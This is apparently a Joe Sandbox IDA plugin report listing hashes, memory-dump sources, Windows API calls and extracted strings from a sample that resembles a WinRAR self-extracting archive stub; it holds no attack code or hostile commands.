                                        • Instruction ID: 45c1d073d52f6c89d1508ec9cc266f5be695cc49ca2b7d06551da406566c0a7b
                                        • Opcode Fuzzy Hash: c49d0f90227ae5ae537f52a45c31fe0291edc062dc532321073d32079da1b0b1
                                        • Instruction Fuzzy Hash: 9631D2749112299BCF21DF64D9887DCBBB8BF08310F5041EAE81CA7261EB709F918F45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                        • Instruction ID: fb938721494f8706a8277966ab3d72ed9fbe82a0df0acf3ba97d143fa5263a3d
                                        • Opcode Fuzzy Hash: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                        • Instruction Fuzzy Hash: B8024C71E102199BDF14DFA9C8806ADF7F5EF89314F25426AD919E7340DB70AE518B80
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0028FD6A
                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,002B9714,?,?), ref: 0028FDB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FormatInfoLocaleNumber
                                        • String ID:
                                        • API String ID: 2169056816-0
                                        • Opcode ID: 563b4276fc4768a292be918edc39e9ff38d307ef045d5b19ab71d8dffb38a403
                                        • Instruction ID: 6a4a624754a6f0c720cdf0020b8336e9df47b3caa1594d52ad36e8adc7f2ea28
                                        • Opcode Fuzzy Hash: 563b4276fc4768a292be918edc39e9ff38d307ef045d5b19ab71d8dffb38a403
                                        • Instruction Fuzzy Hash: 1F118E75221358ABEB00DF60EC49FEAB7F8EF08700F104429F605A7191DA70A998DB64
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CMT
                                        • API String ID: 0-2756464174
                                        • Opcode ID: b4fda0099bec0c85d72c224352783c1fb68b983043ae2ca68d34ff9f2e82496d
                                        • Instruction ID: 4511e8dcbe62c8eb729d927be485a80386edaa2c9c1db68a9f0ed990d94cc517
                                        • Opcode Fuzzy Hash: b4fda0099bec0c85d72c224352783c1fb68b983043ae2ca68d34ff9f2e82496d
                                        • Instruction Fuzzy Hash: 0662C871A216559FDF09EF74C881BDD7BA4BF15300F088179EC099B282DB74A968CFA1
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002A86CD,?,?,00000008,?,?,002A836D,00000000), ref: 002A88FF
                                         Similarity
                                         • API ID: ExceptionRaise
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002966AA
                                         Similarity
                                         • API ID: FeaturePresentProcessor
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 002803ED
                                          • Part of subcall function 00280469: __EH_prolog3.LIBCMT ref: 00280470
                                         Similarity
                                         • API ID: H_prolog3Version
                                        Strings
                                         Similarity
                                         • String ID: gj
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00026A20,00296445), ref: 00296A10
                                         Similarity
                                         • API ID: ExceptionFilterUnhandled
                                        APIs
                                         Similarity
                                         • API ID: HeapProcess
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                        • Instruction ID: 5b4d4439b0f47c56d44c9c9f1734720981cff19d77a2e28deefdc95ff400fcfb
                                        • Opcode Fuzzy Hash: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                        • Instruction Fuzzy Hash: C73116B56287068FDB14EF28C85126ABBD0FB95310F14492EE4D9C3782D775E829CF92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                        • Instruction ID: b85fab2017f921cf5bd23c69ade38c70a82bb7310584fcbc38332b9f67bb411b
                                        • Opcode Fuzzy Hash: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                        • Instruction Fuzzy Hash: 7D411930515B11CFC71ADF34D095AA6B7E4FF4A700B1288AFD06A8B261EB30EA04CF59
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction ID: d7e9a0ed08d6c7778e8772f70e5afee389ad98ffd1767f33e9ea525b2ec11a52
                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction Fuzzy Hash: 0A11087726418343DF148E2ED4B46BAA399EAC633076C43FED1524B6D8D222E9F59908
                                        APIs
                                        • _swprintf.LIBCMT ref: 00283EEA
                                          • Part of subcall function 0027F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027F6CD
                                          • Part of subcall function 002889ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,002BE088,?,00000007,002833E2,?,?,00000050,D946AC94), ref: 00288A0A
                                        • _strlen.LIBCMT ref: 00283F0B
                                        • SetDlgItemTextW.USER32(?,002B919C,?), ref: 00283F64
                                        • GetWindowRect.USER32(?,?), ref: 00283F9A
                                        • GetClientRect.USER32(?,?), ref: 00283FA6
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00284051
                                        • GetWindowRect.USER32(?,?), ref: 00284081
                                        • SetWindowTextW.USER32(?,?), ref: 002840B0
                                        • GetSystemMetrics.USER32(00000008), ref: 002840B8
                                        • GetWindow.USER32(?,00000005), ref: 002840C3
                                        • GetWindowRect.USER32(00000000,?), ref: 002840F3
                                        • GetWindow.USER32(00000000,00000002), ref: 00284165
                                        Similarity
                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                        • String ID: $%s:$CAPTION$d$qI)
                                        • API String ID: 2407758923-2125137076
                                        APIs
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(002C60E0,00000FA0,?,?,00296185), ref: 002961B3
                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00296185), ref: 002961BE
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00296185), ref: 002961CF
                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002961E1
                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002961EF
                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00296185), ref: 00296212
                                        • DeleteCriticalSection.KERNEL32(002C60E0,00000007,?,?,00296185), ref: 00296235
                                        • CloseHandle.KERNEL32(00000000,?,?,00296185), ref: 00296245
                                        Strings
                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 002961B9
                                        • SleepConditionVariableCS, xrefs: 002961DB
                                        • kernel32.dll, xrefs: 002961CA
                                        • WakeAllConditionVariable, xrefs: 002961E7
                                        Similarity
                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 2565136772-3242537097
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 002A3816
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A33CE
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A33E0
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A33F2
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3404
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3416
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3428
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A343A
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A344C
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A345E
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3470
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3482
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A3494
                                          • Part of subcall function 002A33B1: _free.LIBCMT ref: 002A34A6
                                        • _free.LIBCMT ref: 002A380B
                                          • Part of subcall function 002A03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?), ref: 002A03EA
                                          • Part of subcall function 002A03D4: GetLastError.KERNEL32(?,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?,?), ref: 002A03FC
                                        • _free.LIBCMT ref: 002A382D
                                        • _free.LIBCMT ref: 002A3842
                                        • _free.LIBCMT ref: 002A384D
                                        • _free.LIBCMT ref: 002A386F
                                        • _free.LIBCMT ref: 002A3882
                                        • _free.LIBCMT ref: 002A3890
                                        • _free.LIBCMT ref: 002A389B
                                        • _free.LIBCMT ref: 002A38D3
                                        • _free.LIBCMT ref: 002A38DA
                                        • _free.LIBCMT ref: 002A38F7
                                        • _free.LIBCMT ref: 002A390F
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0028D919
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        • _wcslen.LIBCMT ref: 0028D97B
                                        • _wcslen.LIBCMT ref: 0028D99A
                                        • _wcslen.LIBCMT ref: 0028D9B6
                                        • _strlen.LIBCMT ref: 0028DA14
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,002AD9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 0028DA2D
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 0028DA54
                                        Similarity
                                        • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                        • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                        • API String ID: 1185167184-1533471033
                                        APIs
                                        • GetWindow.USER32(?,00000005), ref: 002937C4
                                        • GetClassNameW.USER32(00000000,?,00000080), ref: 002937F0
                                          • Part of subcall function 00288DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00280E3F,?,?,?,00000046,00281ECE,00000046,?,exe,00000046), ref: 00288DBA
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0029380C
                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00293823
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00293837
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00293860
                                        • DeleteObject.GDI32(00000000), ref: 00293867
                                        • GetWindow.USER32(00000000,00000002), ref: 00293870
                                        Similarity
                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                        • String ID: Pl)uDK)$STATIC
                                        • API String ID: 3820355801-3216236245
                                        APIs
                                        • _free.LIBCMT ref: 0029FF25
                                          • Part of subcall function 002A03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?), ref: 002A03EA
                                          • Part of subcall function 002A03D4: GetLastError.KERNEL32(?,?,002A3546,?,00000000,?,00000000,?,002A356D,?,00000007,?,?,002A396A,?,?), ref: 002A03FC
                                        • _free.LIBCMT ref: 0029FF31
                                        • _free.LIBCMT ref: 0029FF3C
                                        • _free.LIBCMT ref: 0029FF47
                                        • _free.LIBCMT ref: 0029FF52
                                        • _free.LIBCMT ref: 0029FF5D
                                        • _free.LIBCMT ref: 0029FF68
                                        • _free.LIBCMT ref: 0029FF73
                                        • _free.LIBCMT ref: 0029FF7E
                                        • _free.LIBCMT ref: 0029FF8C
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        Similarity
                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 322700389-393685449
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027D99A
                                        • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0027D9BF
                                        • GetLongPathNameW.KERNEL32(?,?,?), ref: 0027DA11
                                        • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 0027DA34
                                        • GetShortPathNameW.KERNEL32(?,?,?), ref: 0027DA84
                                        • MoveFileW.KERNEL32(-00000040,-00000028), ref: 0027DC9F
                                        • MoveFileW.KERNEL32(-00000028,-00000040), ref: 0027DCEC
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        Similarity
                                        • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                        • String ID: rtmp
                                        • API String ID: 2388273531-870060881
                                        • Opcode ID: fd5e62e1e06c654355a21dfa0fc17b71e3cbe87fbf448fbdd438608e4988fe23
                                        • Instruction ID: 869050aedd0140228300cec72a345b8176a6579edec0ba105aa8d8609ea2272a
                                        • Opcode Fuzzy Hash: fd5e62e1e06c654355a21dfa0fc17b71e3cbe87fbf448fbdd438608e4988fe23
                                        • Instruction Fuzzy Hash: 3CB13671921218DACF21EFA4CC89BDDBBB9BF15305F548099E40DA7251DB309BA9CF60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3__wcslen
                                        • String ID: .rar$exe$rar$sfx
                                        • API String ID: 3251556500-630704357
                                        • Opcode ID: 48f0668986f82ae2d0f06cda1bc50b747b43cbcda8c62428219c60b83f5a2016
                                        • Instruction ID: a1d588bf96b6eebfb11bcd6ebad35d23202d4c10b8166cec47151e5f79f11ba0
                                        • Opcode Fuzzy Hash: 48f0668986f82ae2d0f06cda1bc50b747b43cbcda8c62428219c60b83f5a2016
                                        • Instruction Fuzzy Hash: 47711538A22714DBCB21FFA8C941AADB3F8BF58710F20451AF4819B6D1DB715976CB50
                                        APIs
                                          • Part of subcall function 00271E44: GetDlgItem.USER32(00000000,00003021), ref: 00271E88
                                          • Part of subcall function 00271E44: SetWindowTextW.USER32(00000000,002AC6C8), ref: 00271E9E
                                        • EndDialog.USER32(?,00000001), ref: 00290720
                                        • SendMessageW.USER32(?,00000080,00000001,0001041B), ref: 00290747
                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,00050D57), ref: 00290760
                                        • GetDlgItem.USER32(?,00000065), ref: 0029077C
                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00290790
                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 002907A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: MessageSend$Item$DialogTextWindow
                                        • String ID: LICENSEDLG$J)
                                        • API String ID: 3077722735-2388866260
                                        • Opcode ID: a29c80fe38aa40797082c04302337e69e02d0abc1b3700184a125e8168b8b58c
                                        • Instruction ID: 21c24a20b7e67d4fe2818af4586ffd79ada4975a3607db7f2d936fb940504839
                                        • Opcode Fuzzy Hash: a29c80fe38aa40797082c04302337e69e02d0abc1b3700184a125e8168b8b58c
                                        • Instruction Fuzzy Hash: BB21F431264209BFDA106FA5ED8DFEB7B6DEF46795F010104F604A6090C7A1B9618F31
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,002804AB,002804AD,00000000,00000000,D946AC94,00000001,00000000,00000000,?,0028038C,?,00000004,002804AB,ROOT\CIMV2), ref: 00295459
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,002804AB,?,00000000,00000000,?,?,0028038C,?,00000004,002804AB), ref: 002954D4
                                        • SysAllocString.OLEAUT32(00000000), ref: 002954DF
                                        • _com_issue_error.COMSUPP ref: 00295508
                                        • _com_issue_error.COMSUPP ref: 00295512
                                        • GetLastError.KERNEL32(80070057,D946AC94,00000001,00000000,00000000,?,0028038C,?,00000004,002804AB,ROOT\CIMV2), ref: 00295517
                                        • _com_issue_error.COMSUPP ref: 0029552A
                                        • GetLastError.KERNEL32(00000000,?,0028038C,?,00000004,002804AB,ROOT\CIMV2), ref: 00295540
                                        • _com_issue_error.COMSUPP ref: 00295553
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                        • String ID:
                                        • API String ID: 1353541977-0
                                        • Opcode ID: 70f52c3837bfec40db2a8050b40cd9a2e6a05df8608a7df1f84b220a93d107d8
                                        • Instruction ID: 05714e15c500a4dc45b2d35104ca7be5739d1716bd1753ab20f379d968ce5164
                                        • Opcode Fuzzy Hash: 70f52c3837bfec40db2a8050b40cd9a2e6a05df8608a7df1f84b220a93d107d8
                                        • Instruction Fuzzy Hash: B7413B71B20625ABCF11DF68DC45BAEBBE8EF44710F504229F909E7241DB35D850CBA4
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 00280470
                                          • Part of subcall function 00280360: __EH_prolog3.LIBCMT ref: 00280367
                                        • VariantClear.OLEAUT32(?), ref: 002805FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3$ClearVariant
                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                        • API String ID: 4196654922-3505469590
                                        • Opcode ID: 376d09a1528f37ccd5600b7088c8467271ea5f8a9986ee6684af2e9fded2ed6c
                                        • Instruction ID: f8b5a46efdb604e1388e14d35b9435cbee5d3337d2635110410a85ebf8614689
                                        • Opcode Fuzzy Hash: 376d09a1528f37ccd5600b7088c8467271ea5f8a9986ee6684af2e9fded2ed6c
                                        • Instruction Fuzzy Hash: 15616B74A21219AFDB54EFA4DC99EAEB7B8FF49310B14045CF502A72A0CB30AD15CF60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_wcslen
                                        • String ID: $</p>$</style>$<br>$<style>
                                        • API String ID: 3746244732-3393513139
                                        • Opcode ID: 3da78299d21f32aa0b71e37b98c71078d456bd60f1a9d22f8f92e8f1158340d1
                                        • Instruction ID: 53c08f0dafedf756e27f48071493b0029eb42225e8554d2463e0c8ecebcf8748
                                        • Opcode Fuzzy Hash: 3da78299d21f32aa0b71e37b98c71078d456bd60f1a9d22f8f92e8f1158340d1
                                        • Instruction Fuzzy Hash: 1651463DB3221393DF30BE24881577AB3A6AF65741F5A4019FD85AB2C1EB759DB08390
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0028E26C
                                        • ShowWindow.USER32(?,00000000,00000038), ref: 0028E294
                                        • GetWindowRect.USER32(?,?), ref: 0028E2D8
                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 0028E373
                                        • ShowWindow.USER32(00000000,00000005), ref: 0028E394
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Window$Show$H_prolog3_Rect
                                        • String ID: RarHtmlClassName$gI)
                                        • API String ID: 950582801-1431589318
                                        • Opcode ID: d158ed4b226c52aa727216e00aec581c4bf0529b418ab76e0117a8f5bd8451f2
                                        • Instruction ID: 17f09e8aca02569279d576464ecd3a3bfbb155e448d8c0911c5c7e4f02631d50
                                        • Opcode Fuzzy Hash: d158ed4b226c52aa727216e00aec581c4bf0529b418ab76e0117a8f5bd8451f2
                                        • Instruction Fuzzy Hash: DD416A71911205EFDF11AFA4EC89EAE7BB8EF48300F154056F908AB195DB709D61CF60
                                        APIs
                                        • GetDC.USER32(00000000), ref: 0028F1F5
                                        • GetObjectW.GDI32(?,00000018,?), ref: 0028F224
                                        • ReleaseDC.USER32(00000000,?), ref: 0028F2BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                         • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ObjectRelease
                                        • String ID: NK)$Pl)uDK)$lK)$vK)
                                        • API String ID: 1429681911-4032922049
                                        • Opcode ID: 30d320d4948e9b480a57caf209a05276d5b28ce597cb7af554f17514b79b3145
                                        • Instruction ID: c84cdd7288e503bf740580bdda953e79ef48ea212ef0fa91dd073f249e46c165
                                        • Opcode Fuzzy Hash: 30d320d4948e9b480a57caf209a05276d5b28ce597cb7af554f17514b79b3145
                                        • Instruction Fuzzy Hash: 3F21E6B610C314AFD7019FA1EC4CE6BBFA9FB89351F040929FE4592220D67199558F62
                                        APIs
